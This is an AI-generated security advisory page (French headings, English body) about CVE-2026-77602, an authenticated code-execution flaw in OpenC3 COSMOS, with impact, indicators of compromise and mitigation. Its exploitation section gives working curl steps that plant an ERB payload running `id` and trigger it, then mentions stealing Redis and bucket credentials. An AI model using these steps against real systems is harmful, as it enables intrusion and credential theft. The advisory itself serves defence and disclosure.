CVE-2026-77602: 
Ruby Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-77602 is a critical authenticated remote code execution vulnerability in OpenC3 COSMOS, a command and control framework for embedded systems. It affects versions 5.1.0 through 7.2.1 (inclusive), and was published on September 23, 2026 with a fix released in version 7.3.0. The root cause is that the user-writable targets_modified/ configuration overlay is processed as executable code by multiple subsystems, allowing any authenticated non-administrator user to achieve arbitrary code execution on the server. It carries a CVSS v3.1 base score of 9.9 (Critical) (Github Advisory, OpenC3 Advisory).

Détails techniques

The vulnerability is classified as CWE-94 (Improper Control of Generation of Code / Code Injection). The root cause is that TargetFile.body() reads from the user-writable {scope}/targets_modified/{name} path before the read-only {scope}/targets/{name} tree, and three distinct code-execution sinks process these files without privilege gating: (1) ERB rendering — ConfigParser#parse_file runs ERB.new(File.read(filename)).result() by default (run_erb=true) on table and cmd/tlm definitions; (2) GENERIC conversion eval — GenericConversion#call executes eval(@code_to_eval) in Ruby or compile()/exec()/eval() in Python on GENERIC_READ_CONVERSION_START/GENERIC_WRITE_CONVERSION_START blocks; (3) Suite require — run_suite_analysis.rb executes require ARGV[1] on procedure files. Non-admin users can write to targets_modified/ via the screen-save endpoint (screens_controller.rb create, requiring only system_set) or the storage-upload presigned endpoint (which exempted targets_modified/ from its admin check), and trigger execution via table actions (system tier) or suite analysis (script_view tier) — both below the admin/script_run tiers where COSMOS normally gates code execution. In the open-source edition, authorize ignores the permission string and checks only token validity, meaning any authenticated user qualifies (OpenC3 Advisory, Fix PR).

Impact

Successful exploitation grants arbitrary code execution as the openc3 user (uid=1001) within the cmd-tlm-api container, per-target decom microservices, and the Script Runner process. These microservices hold Redis credentials, object storage (bucket) credentials, and sit on the internal service network, giving an attacker full read/write access to COSMOS configuration, telemetry, and command data across all scopes. The scope change (S:C in CVSS) reflects that a low-privilege user can compromise privileged microservice containers, enabling lateral movement to internal infrastructure. In multi-user deployments where the API port is exposed over the network, this is fully remotely exploitable; in default single-host installs, the API is bound to 127.0.0.1:2900 via Traefik, limiting exposure to local access (OpenC3 Advisory).

Exploitabilité

A detailed proof-of-concept exploit using curl commands is publicly available in the GitHub security advisory, confirmed end-to-end against a booted Rails/puma instance (OpenC3 Advisory). The exploit requires only a valid authenticated session (any non-admin user in the open-source edition) and network access to the COSMOS API endpoint. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.574% (45th percentile), and NVD SSVC classifies exploitation status as 'poc' with technical impact 'total' (Github Advisory). No threat actor attribution has been reported.

Étapes d’exploitation

  1. Authenticate: Obtain a valid session token by POSTing credentials to the COSMOS auth endpoint:
BASE=http://localhost:2900/openc3-api
TOKEN=$(curl -s -X POST "$BASE/auth/verify" -H 'Content-Type: application/json' -d '{"password":"<password>"}')
  1. Write malicious payload to targets_modified/: Use the screen-save endpoint (requires only system_set, or any authenticated user in the open-source edition) to store an ERB payload verbatim in the overlay:
curl -s -X POST "$BASE/screen" -H "Authorization: $TOKEN" \
  --data-urlencode 'scope=DEFAULT' --data-urlencode 'target=INST' --data-urlencode 'screen=poc' \
  --data-urlencode $'text=SCREEN AUTO AUTO 1.0\n<%= File.write("/tmp/erb_rce_poc", `id`) %>\nLABEL poc'

Alternatively, use the storage-upload presigned endpoint to write a GENERIC conversion block or a suite procedure file to targets_modified/<TARGET>/cmd_tlm/ or targets_modified/<TARGET>/procedures/.

  1. Trigger code execution: Point a table action at the malicious file to cause ERB rendering in the cmd-tlm-api container:
curl -s -X POST "$BASE/tables/generate" -H "Authorization: $TOKEN" \
  --data-urlencode 'scope=DEFAULT' --data-urlencode 'definition=INST/screens/poc.txt'

The request returns HTTP 500 (invalid table keywords), but the ERB payload has already executed.

  1. Verify execution: In the cmd-tlm-api container, confirm RCE:
cat /tmp/erb_rce_poc
# Output: uid=1001(openc3) ...
  1. Escalate / pivot: With code execution as the openc3 user, extract Redis credentials and bucket credentials from the container environment, then pivot to internal services or exfiltrate telemetry and command data across all COSMOS scopes (OpenC3 Advisory).

Indicateurs de compromis

  • Network: Unexpected POST requests to /openc3-api/screen with text parameters containing ERB template syntax (e.g., <%=, %>) or shell backtick expressions; POST requests to /openc3-api/tables/generate or /openc3-api/tables/report referencing paths under screens/ or non-standard definition paths; presigned upload requests targeting targets_modified/<TARGET>/cmd_tlm/ or targets_modified/<TARGET>/procedures/ from non-admin users.
  • File System: Unexpected files in targets_modified/<TARGET>/screens/, targets_modified/<TARGET>/cmd_tlm/, or targets_modified/<TARGET>/procedures/ containing ERB tags, GENERIC_WRITE_CONVERSION_START/GENERIC_READ_CONVERSION_START blocks with shell commands, or Ruby require-compatible suite files with malicious top-level code; marker files in /tmp/ created by the openc3 user (e.g., /tmp/erb_rce_poc).
  • Logs: COSMOS API access logs showing HTTP 500 responses to tables/generate or tables/report immediately after a POST /screen or storage upload from the same authenticated session; ERB evaluation errors or unexpected Ruby/Python eval exceptions in cmd-tlm-api or decom microservice logs.
  • Process: Unexpected child processes spawned by the cmd-tlm-api, decom, or script-runner Java/Ruby processes (e.g., /bin/sh, curl, wget, python) running as uid=1001(openc3); unusual outbound network connections from COSMOS microservice containers to external IPs (OpenC3 Advisory).

Atténuation et solutions de contournement

The primary remediation is to upgrade OpenC3 COSMOS to version 7.3.0 or later, which treats the targets_modified/ overlay as data rather than code by disabling ERB rendering at runtime (run_erb=false in PacketConfig, TableConfig), restricting cmd_tlm overlay writes to admin users only, and gating suite analysis execution at the script_run permission tier (Fix PR, Github Advisory). If immediate upgrade is not possible, restrict non-administrator user permissions to prevent creation or modification of files in targets_modified/, disable or restrict access to the screen-save and storage-upload endpoints for non-admin users, and avoid exposing the COSMOS API port (2900) to untrusted networks. Additionally, monitor and audit all configuration changes and file uploads in the COSMOS environment, and implement network segmentation to limit lateral movement from compromised COSMOS containers to internal credential stores.

Réactions de la communauté

The vulnerability was credited to researcher Marnick39 and published by OpenC3 maintainer jmthomas on September 3, 2026, with the GitHub Advisory Database entry published September 23, 2026 (Github Advisory). The fix PR discussion shows that the initial remediation approach (read-path gating) was rejected by maintainer ryanmelt in favor of a more comprehensive solution: removing ERB rendering entirely from runtime config parsing and restricting it to plugin install time only (Fix PR). No significant broader media coverage or social media discussion has been identified beyond the GitHub advisory and automated CVE tracking services.

Ressources additionnelles


Source: Ce rapport a été généré à l’aide de l’IA

Apparenté Ruby Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-55107CRITICAL10
  • Ruby logoRuby
  • kobako
NonOuiSep 30, 2026
CVE-2026-77602CRITICAL9.9
  • Ruby logoRuby
  • openc3
NonOuiSep 23, 2026
CVE-2026-77601HIGH8.8
  • Ruby logoRuby
  • openc3
NonOuiSep 23, 2026
CVE-2026-84782HIGH8.2
  • Ruby logoRuby
  • rpm-sequoia-devel
NonOuiSep 29, 2026
GHSA-4825-p4xm-pcf2HIGH7.1
  • Ruby logoRuby
  • spree_api
NonOuiSep 22, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités